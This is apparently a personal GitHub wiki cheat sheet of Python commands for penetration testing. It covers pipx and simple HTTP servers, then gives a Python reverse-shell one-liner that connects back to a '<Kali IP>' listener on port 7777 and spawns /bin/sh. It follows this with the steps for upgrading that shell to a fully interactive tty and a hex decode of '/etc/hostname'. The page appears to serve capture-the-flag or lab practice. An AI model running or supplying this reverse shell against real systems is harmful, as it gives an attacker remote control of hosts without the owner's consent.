-
Notifications
You must be signed in to change notification settings - Fork 14
Python
Alvin Smith edited this page Apr 9, 2024
·
18 revisions
This automatically creates a virtual environment, installs the package, and adds the package's associated applications (entry points) to a location on your PATH. For example, pipx install pycowsay
makes the pycowsay
command available globally, but sandboxes the pycowsay package in its own virtual environment. pipx never needs to run as sudo to do this.
https://github.com/A1vinSmith/arbitrary-python
python -m SimpleHTTPServer 80
python3 -m http.server
The default port is 8000
if not working script /dev/null -c bash
- Another netcat listener for the below
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- However this shell still won’t do what we want it to, so we need to get full tty for an interactive shell.
python -c 'import pty; pty.spawn("/bin/bash")'
or
python3 -c 'import pty; pty.spawn("/bin/bash")'
- If phase 2 not make the job done(Python spawn a better-featured bash shell. But still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell).
export TERM=xterm // give us access to term commands such as clear.
- Press CTRL+Z to put the shell in the background. Next, type this command in the same window:
stty raw -echo;fg
. This will bring your shell back to the foreground with a fully interactive experience. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
ps: Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.
- OPTIONAL, adjust tty size
❯ tput cols
124
❯ tput lines
56
stty rows 56 columns 124
0x2f6574632f686f73746e616d65
print(bytes.fromhex('2f6574632f686f73746e616d65'))
0x20
print(bytes.fromhex('20'))